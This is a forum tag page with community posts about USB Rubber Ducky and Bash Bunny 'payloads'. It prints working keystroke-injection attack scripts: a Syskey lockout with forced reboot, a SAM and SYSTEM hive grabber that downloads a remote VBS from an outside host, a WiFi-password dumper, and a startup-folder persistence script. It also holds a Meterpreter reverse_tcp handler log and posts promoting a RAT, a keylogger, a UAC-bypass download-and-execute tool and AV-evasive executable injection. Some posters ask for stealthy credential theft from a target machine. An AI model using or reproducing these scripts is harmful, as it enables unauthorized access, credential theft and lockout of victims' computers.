Showing results for tags 'payload'.

  1. I saw a Syskey prank done on a USB via RubberDucky, so I decided to rewrite one for the Bashbunny even though it really serves no great purpose. Furthermore, after Syskey'ing myself, I don't want the dang thing anymore, so I'm releasing it.

     #!/bin/bash
     #
     # Title: SysKey and Reboot
     # Author: Ar1k88
     # Version: 1.1b
     # Target: Windows 7-10
     #
     # LED | Function
     # ---------------------------------------------------------
     # MAGENTA SLOW - USB Detection/Setup
     # YELLOW FAST/VERYFAST - Script Startup/Execute
     # CYAN VERYFAST - Shutting down Target Machine
     # GREEN BLINK/SOLID - Shutting down Bashbunny for safe removal
     # LED OFF - Bashbunny is Off, Safe to remove.
     #
     # Startup Delay 3 seconds.
     LED M SLOW
     ATTACKMODE HID
     Q DELAY 3000
     # Force to Desktop
     LED Y FAST
     Q GUI d
     Q DELAY 250
     # Open Run and Syskey
     Q GUI r
     Q DELAY 500
     Q STRING syskey
     Q ENTER
     Q DELAY 500
     # UAC Bypass
     Q ALT y
     # Setup Syskey - Setting Password as bashbunny
     LED Y VERYFAST
     Q DELAY 500
     Q STRING u
     Q DELAY 250
     Q STRING p
     Q DELAY 250
     Q STRING w
     Q DELAY 250
     Q STRING bashbunny
     Q TAB
     Q DELAY 250
     Q STRING bashbunny
     Q DELAY 250
     Q ENTER
     Q DELAY 500
     Q ENTER
     # Rebooting Target Machine
     LED C VERYFAST
     Q GUI r
     Q DELAY 500
     Q STRING CMD
     Q ENTER
     Q DELAY 500
     Q STRING shutdown /r /f /t 0
     Q ENTER
     Q DELAY 250
     # Success - Starting Bashbunny Safe Shutdown
     LED SUCCESS
     sync -o
     Q DELAY 3000
     shutdown 0

     SysKey Password: bashbunny

     Please be responsible. ;)
     -Ar1k88
  2. Hi, Hak5 Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote Administration Tool) with the Ducky.

     Here is the GitHub link: https://github.com/untitledusername/duckyRAT
     GitHub Wiki/Tutorial link: https://github.com/untitledusername/duckyRAT/wiki

     Please note, this script doesn't allow webcam access or things of that sort (I'm sure you can probably get that somehow using the command line). This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below.

     Edit: I'm working on adding features to take screenshots of the victim's desktop, webcam, etc.

     Thanks everybody, enjoy!
     - untitled ❤
  3. This is a simple ducky script I wrote that will clear your Google Chrome history and automatically log you off. Tested on Windows 7 (Windows 8-10 requires modification because of the Start menu). This payload is useful for when Run/GUI + R is blocked.

     DELAY 1000
     CTRL + H
     DELAY 750
     DELETE
     DELAY 2000
     CTRL + W
     DELAY 750
     GUI
     DELAY 100
     TAB
     DELAY 100
     TAB
     DELAY 100
     ENTER

     You may want to increase the delays, as most library computers can be slower than the average machine.
  4. Hi there, I have a little question. I love my Bash Bunny and have created a lot of payloads (I will post them when they are really finished), but I still have some questions. Actually, for all my payloads I open a terminal, minimize it and do my stuff. When I look at this kind of payload, on line 24 there is a Unix command, "mkdir". So, is it possible to use Unix commands without a terminal?

     Reminder for people who read this topic, Unix commands that work in a payload: mkdir, source, export
  5. So I was recently looking into NFC and how cool it is to read/write to a tag to be able to use it to control your phone, clone a card (don't do dis - illegal) and other cool stuff, and I thought about making a payload that installs an app on an Android phone (you can use HID if you wanted to..) and then runs the app in the background. What this app does is wait to read an NFC tag, which then executes a command. The command is stored on the NFC tag itself (so you install the app on the phone and come back later with your NFC tags to do all your fancy work). Works, basically, (dare I say it..) like a 'PowerShell agent'. You could make like 10 different tags that can do different things on the phone. You only have to brush the tags near the phone for the phone to execute the commands. Commands could be:

     - Send an SMS to yourself (the phone number is stored on the NFC tag so it won't be stored on the phone itself) with phone data
     - Call someone (prank call but..you pranked the actual call itself)
     - Open a webpage and download a file
     - Download an app from the app store
     - Add a contact (dunno why..)
     - Execute a Linux command (requires rooted Android)
     - Enable hotspot with a specified password (you could use their data..more of an annoyance than anything else - would need a rooted device to change the password)
     - Enable Bluetooth/WiFi
     - Change the volume of the device (shoot it up, make it silent..)
     - Make it vibrate for the next 10 minutes (that would be hilarious)
     - Make it start randomly ringing
     - Add a huge number of alarms that go off every minute/hour
     - Enable hotspot and start a server so that you could join it and remotely manage files/apps/settings (includes starting an ADB server...oooooooo..)

     Possibilities are endless... Just an idea. Installing the app from the Bash Bunny onto the device is the tricky part.
  6. Hello. I was messing around with Metasploit. I'm using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at "Starting the payload handler...". The new one works fine. Need help fixing it please. Here's the Armitage log:

     msf > use exploit/multi/handler
     msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
     PAYLOAD => windows/meterpreter/reverse_tcp
     msf exploit(handler) > set LHOST PUBLIC IP
     LHOST => PUBLIC IP
     msf exploit(handler) > set LPORT 4443
     LPORT => 4443
     msf exploit(handler) > set Encoder x86/shikata_ga_nai
     Encoder => x86/shikata_ga_nai
     msf exploit(handler) > set EXITFUNC process
     EXITFUNC => process
     msf exploit(handler) > set ExitOnSession false
     ExitOnSession => false
     msf exploit(handler) > set Iterations 3
     Iterations => 3
     msf exploit(handler) > exploit -j
     [*] Exploit running as background job.
     [*] Started reverse TCP handler on PUBLIC IP:4443
     [*] Starting the payload handler...
  7. Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I can't seem to get it to work. I plug it in and the screen just goes crazy and then it doesn't copy anything over. Here is the script I am using.

     REM Modifications by overwraith
     ESCAPE
     CONTROL ESCAPE
     DELAY 400
     STRING cmd
     DELAY 400
     ENTER
     DELAY 400
     REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY
     REM TO DESIRED DIRECTORY WOULD HAVE GONE.
     REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE.
     STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
     ENTER
     DELAY 800
     STRING cd %DUCKYdrive%
     DELAY 400
     STRING copy con download.vbs
     ENTER
     STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
     ENTER
     STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
     ENTER
     STRING If objXMLHTTP.Status = 200 Then
     ENTER
     STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
     ENTER
     STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
     ENTER
     STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
     ENTER
     STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
     ENTER
     STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
     ENTER
     CTRL z
     ENTER
     STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs
     ENTER
     DELAY 800
     STRING del download.vbs
     ENTER
     DELAY 800
     STRING cscript vssown.vbs /start
     ENTER
     DELAY 800
     STRING cscript vssown.vbs /create
     ENTER
     DELAY 800
     STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
     ENTER
     DELAY 800
     STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
     ENTER
     DELAY 800
     STRING cscript vssown.vbs /stop
     ENTER
     DELAY 800
     STRING del vssown.vbs
     ENTER
     STRING exit
     ENTER
     REM Make sure to change the DIRECTORY above.

     I changed
     STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
     to
     STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .

     Also the following:
     STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
     to
     STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .

     DUCKY is the name of the MicroSD card, so would that be correct? I changed
     STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs
     to a VBS script provided by the LanMaster53 GitHub account, https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs, and changed the URL to my site hosting it. What am I missing? It doesn't seem to work or dump any files back on the Rubber Ducky. I am running the Twin Duck firmware.
  8. Here is my new payload to attack a Mac without using Terminal. I got this idea after seeing how, using good management software, an administrator can remove an app from a Mac (one such application being Terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files, and all without Terminal. I used Grab.app for this, but almost any app could be used; I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it. Here is the code; its outcome is to simply "say hello" (so if you test it, have the volume up a bit). I have not really played with the delays yet; they are all over the place and some are too high, but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have fun, but please use this responsibly.

     DELAY 2000
     COMMAND SPACE
     DELAY 300
     STRING /Applications/Utilities/
     DELAY 200
     ENTER
     DELAY 400
     STRING g
     DELAY 500
     COMMAND c
     DELAY 300
     COMMAND SPACE
     DELAY 300
     STRING /Users/Shared/
     DELAY 400
     ENTER
     DELAY 400
     COMMAND v
     DELAY 2000
     COMMAND SPACE
     DELAY 300
     STRING /Users/Shared/Grab.app/Contents/MacOS/
     DELAY 600
     ENTER
     DELAY 500
     TAB
     DELAY 500
     COMMAND o
     DELAY 500
     COMMAND a
     DELAY 500
     STRING #!/bin/bash
     DELAY 400
     ENTER
     DELAY 300
     STRING say
     DELAY 300
     ESCAPE
     DELAY 300
     SPACE
     DELAY 300
     STRING hello
     DELAY 300
     COMMAND s
     DELAY 400
     COMMAND q
     DELAY 500
     COMMAND SPACE
     DELAY 300
     STRING /Users/Shared/Grab.app
     DELAY 400
     ENTER
     COMMAND w
     COMMAND w
     COMMAND w
  9. Hi there, I just finished the first version of my BB keylogger. It basically launches a PowerShell which keylogs to the loot folder of the BB.

     Features:
     - Fast launching (thanks to USB Exfil for the one-line launcher)
     - Leaves no traces when cleanup is enabled. (Insert feature?)

     Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger

     VincBreaker

     PS: I will create a push request upon positive feedback and improve the payload in the other case.
  10. TLDR: https://github.com/ThoughtfulDev/PyDuckGen

     Hey, since the Simple-Ducky Payload Generator is discontinued, I think, I just wanted to create an easy way to generate existing payloads and move the needed files to the Rubber Ducky. PyDuck is a Python script which helps you get your once-written USB Rubber Ducky payloads onto your Duck's SD card quickly. You can even change variable components by using a simple set <attribute> <val> command. All of this is made easy with a Metasploit-like interface. Simply choose your payload with use <payload>, configure it and there you go :)

     Have a look into the bundled modules in the module folder to understand the attributes, but here is a quick explanation. Your duckscript is:

     ...
     STRING <replacable_text>
     ...

     In your module.json just add your attribute to the attributes tree like this:

     "attributes": {
         "replacable_text": "The default value"
     }

     If you now load your payload with 'use <your_payload>' you can use the following:

     set replacable_text Hak5 is awesome :)

     If you then generate the inject.bin using gen or generate, the <replacable_text> will be replaced with Hak5 is awesome. Isn't that...awesome? :D

     You can even add folders/files to your module.json which are needed for your payload (have a look at the mimikatz_lazagne payloads to see how this works). I really suggest that you have a look at the existing payloads to figure out how this works :D

     More information can be found on the GitHub repo: https://github.com/ThoughtfulDev/PyDuckGen

     Let me know what you think.
  11. Here's a simple payload to download and execute a PowerShell payload locally from the Bash Bunny. This payload is especially useful when running larger PowerShell scripts. It's much faster than waiting on HID keystrokes.
  12. Hey all, I rewrote the WiPassDump payload (along with every other person on the planet), but hopefully this one is the best so far. I've cut everything down to 1 file, and the actual attack takes up about 4 lines. As an added bonus I've added hak5darren's code to remove the "run" dialogue history as well. The pull request can be viewed here: https://github.com/hak5/bashbunny-payloads/pull/132 Hope you guys like it.
  13. Hi, I am new to this forum. Hello! Nice to meet you all! I am planning a hacking demonstration on national TV in my country and I want to show the Bash Bunny and what it can do on a live show. For this I need a demonstration payload which can be used to show what a hacker can do.

     Starting points:
     - assume a Windows laptop with a recent and updated operating system
     - assume the "hack" should be carried out on a computer that is on but possibly locked (with a user logged in)
     - I have maybe 30 minutes in total, but this part should only take a maximum of three to five minutes, including showing the results of the hack and explaining what it means
     - the audience is the general public without any detailed technical understanding

     Ideas:
     - can we make a demonstration payload that can showcase some hacks that will work most of the time?
     - can this be a combination of payloads that results in e.g. copying files, passwords, a backdoor?
     - for the hack only one or very few files need to be exfiltrated to demonstrate - not all files.
     - ideally the demonstration should result in the audience saying "wow, that was incredible, can that really be done"?

     Solution and ideas - this is where I need you guys and gals. Any ideas?

     /Blix
  14. Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer
  15. CrackMapExec is a fantastic tool developed by Byt3bl33de3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec

     As stated in the repo's README, it's powered by Impacket and takes cues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network-based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so:

     cd /pentest
     curl -k -O https://bootstrap.pypa.io/get-pip.py

     Now check your Bunny's current system date and time. If it's not current then you need to update it, or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script:

     python get-pip.py

     That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install the packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work.

     apt-get install build-essential libssl-dev libffi-dev python-dev

     Once those packages have been installed successfully, you should now be able to use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top.

     Run pip:

     pip install crackmapexec

     Once that is done, you can test everything by just running "crackmapexec" in your terminal, and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is:

     crackmapexec $TARGET_IP

     That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this:

     crackmapexec $TARGET_IP -u "" -p ""

     That tells CME to try a null session with SMB. If the target disallows null sessions, nothing bad happens. You still get the basic OS details. If the target allows a null session to be initiated, then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing, or passed to you from a teammate), those creds can be used with CME, and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
  16. Ok, so here's a payload that can grab any of the WiFi info for the network the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt". Only works on Windows.

     DELAY 1000
     GUI r
     DELAY 500
     STRING cmd
     ENTER
     DELAY 1000
     REM The @ will be typed as " in the Command prompt
     STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A
     ENTER
     DELAY 100
     STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt
     ENTER
     DELAY 100
     STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A
     ENTER
     DELAY 100
     STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A
     ENTER
     DELAY 100
     STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A
     ENTER
     DELAY 100
     STRING del A.txt
     ENTER
     DELAY 100
     STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
     ENTER

     Feel free to ask any questions, and let me know if there are any errors that need to be fixed in this.
  17. Hello Hak5 members. New to this site and platform, but am pretty excited to be back in the States and to get my hands on the Tetra I purchased. When looking at modules I can't seem to find something similar to the MITMf framework integrated into it. That makes use of filepwn, but I have been having a great experience using Shellter. Where should I go to learn how to integrate a new module into the Pineapple? Here is what I am wanting:

     1. Client makes a request for an .exe file
     2. Pineapple forwards to the web server
     3. Web server responds
     4. Pineapple receives the traffic:
        If (PARAMS == TRUE):
            Pass the executable over to Shellter, inject a payload, then forward to the client.
        else:
            forward to the client

     Some of the params you would set up would be maximum file size (to make sure the process doesn't take too long), whether the program is already wrapped, etc. Ideally, one would be running some sort of HTTPS downgrade attack, or SSL stripper, so the probability of injection is higher, as most sites now use HTTPS. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow users to pipe the executable to whatever program they want to handle the payload injection and just have the module look for the created file to pop up in a specific location.
  18. So I was wondering, how do you program your own payload/backdoor? I usually use Veil-Evasion but I wanna learn how to program it myself.
  19. Since I was introduced to a typewriter when I was 2 years old I have never bothered to practice and learn to type 60+ WPM, nevertheless 900 - 1,200 WPM when the RbbrDucky is inserted. Repetition, with the aid of shorthand keyboard shortcuts, has been the only way I have learned to make myself appear to type as fast as a 60+ WPM typist. ALT + Tab, Windows Key + R; I have become a mastermind of getting where I need to be in an OS using fewer keys that I have to type. Since a lot of tasks I perform are repetitious in Linux, especially in Kali, I have not read of anyone using the RubberDuck to automate their tasks, as the super-typer HID now becomes a scripted AI or "the hacker from Swordfish" mashing on the keys. So I wanted to create a new thread dedicated to "Linux Only", whereby you are using Twin Duck firmware with option 1 "pressing caps lock" to activate the Duck inject.bin. I am not intending to hack Kali Linux or any Linux distro system with a payload. The objective is to have an AI "superman" type for me what I would normally type in Kali or any Linux distro to carry out an automated attack.

     Using Kali, I have enabled a custom keyboard shortcut in keyboard settings to open the terminal, for example "Super + t" or "CTRL + ALT + t". In my Ducky payload script:

     WINDOWS t
     GUI t
     CTRL ALT t
     COMMAND t

     All do not open a custom terminal keyboard shortcut. So I am a bit stuck on this first step.
  20. I purchased the Rubber Ducky recently to grab Windows login creds from Windows 10. I was unaware at the time that it wouldn't quite work as solidly on 10 as it does with older versions of Windows. After testing on various other versions and having it upload the .creds to my server, nothing happened when I attempted it on my target machine (Windows 10). I played around with it quite a bit and finally got the .creds uploading, but with 0 data. Doing some research I came across this page explaining using PowerMemory to edit the registry for storing plaintext credentials. I did this the manual way, rebooted, and voilà, I have my .creds file on the server with the credentials. However, this was done on a test machine and not my target machine.

     HERE IS MY REQUEST: Does anyone have, or can anyone write, a payload to automate this process in a stealthy manner, much like the Mr Robot payload? Maybe I am overlooking something as I am so new to this. Also it could be possible that it would have worked without PowerMemory editing the registry, as I disabled Windows Defender before trying PM, since I saw it had blocked some MK features during my previous attempts. Any feedback would be greatly appreciated!
  21. You may have to change some delays; this was tested on Windows 10.

     PS: I know this is simple, I just didn't see anyone post about it and thought some of you guys might like this. More code, scripts and videos to come; be sure to check me out on YouTube https://www.youtube.com/user/everythingdigital1 and my website http://everythingdigital1.com/

     DELAY 500
     REM *** Bypass UAC ***
     GUI r
     DELAY 250
     STRING powershell Start-Process cmd.exe -Verb runAs
     ENTER
     DELAY 5500
     ALT y
     DELAY 500
     STRING cd \
     ENTER
     STRING cd %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
     ENTER
     REM *** Delete update vbs file if already exists ***
     STRING erase /Q update.vbs
     ENTER
     STRING copy con update.vbs
     ENTER
     STRING dim speechobject
     ENTER
     STRING set speechobject=createobject("sapi.spvoice")
     ENTER
     REM *** Change text in quotes to what you want computer to say ***
     STRING speechobject.speak "Hello user I am watching you"
     ENTER
     CONTROL z
     ENTER
     REM *** Exit ***
     STRING EXIT
     ENTER
  22. Hey guys, I've been exploiting my OWN !!! tablet and phone recently. My phone is running Marshmallow 6.0.1, the tablet uhmm ...KitKat? something lol, 4.4 I think lol. OK, I've created a payload with msfvenom and made the .apk payload, and you have to accept the permissions and install and open the payload to run the binary, right?? OK, what I want to know is, just like in Windows you can create shellcode and drop it into the cmd or drop it into a jpg file and it just runs your binary no questions asked lol, is there any way to run some kind of shellcode "like" payload on Android so I can send the payload via SMS or email etc... so when the user clicks on it, it just runs the binary? So basically what I would like is to embed a payload for Android into a jpg/jpeg/png; it has to be a picture. I know about the pdf deal, I want to do this with a picture... If I've been unclear in any way feel free to ask, I will try my best to explain better what I want. Thanks in advance, I can't wait to hear all your feedback, good or bad, I accept it all, ty ....and special thanks to the whole Hak5 community for just being here, you all are great, who else would I be able to ask questions like this to lmao
  23. Hi, this small payload leaves a YouTube subscription to your channel, if the target Windows machine is online and the user is logged in to his default browser. The ID must be replaced with your channel ID.

     REM Give me a YouTube sub
     REM will open youtube URL with default browser and leave a sub and close the browser
     REM replace the ID with your own
     DELAY 1000
     GUI r
     DELAY 200
     STRING https://www.youtube.com/channel/Channel_ID?sub_confirmation=1
     ENTER
     DELAY 5000
     TAB
     TAB
     SPACE
     DELAY 1000
     ALT F4
  24. This is my official release of my UAC-bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any Windows machine with UAC enabled, as administrator, WITHOUT prompting the user to elevate privileges. It's a 3-second download and execute with admin access. The generator is written in Python so it's cross-compatible with Windows and Linux.

     GitHub: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky
     Full demo: http://sendvid.com/uh6i317i

     It uses a simple 2-stage process.

     Stage 1: Stage one is the script that is triggered when the Ducky is connected to any targeted Windows machine. It will execute a powerful one-liner inside the "Run" dialog of the system. The one-liner is a simple PowerShell script that, when executed, instantly hides the PowerShell window and runs in the background. The PowerShell script downloads and executes our stage 2 .vbs payload in the %temp% directory.

     Stage 2: Once your .vbs payload is on the system, we proceed to download our main binary payload. The .vbs script exploits a flaw in the Windows registry system; this allows us to execute any binary file on the system with admin privileges without prompting the user for access (UAC).

     My Twitter: https://twitter.com/SkiddieTech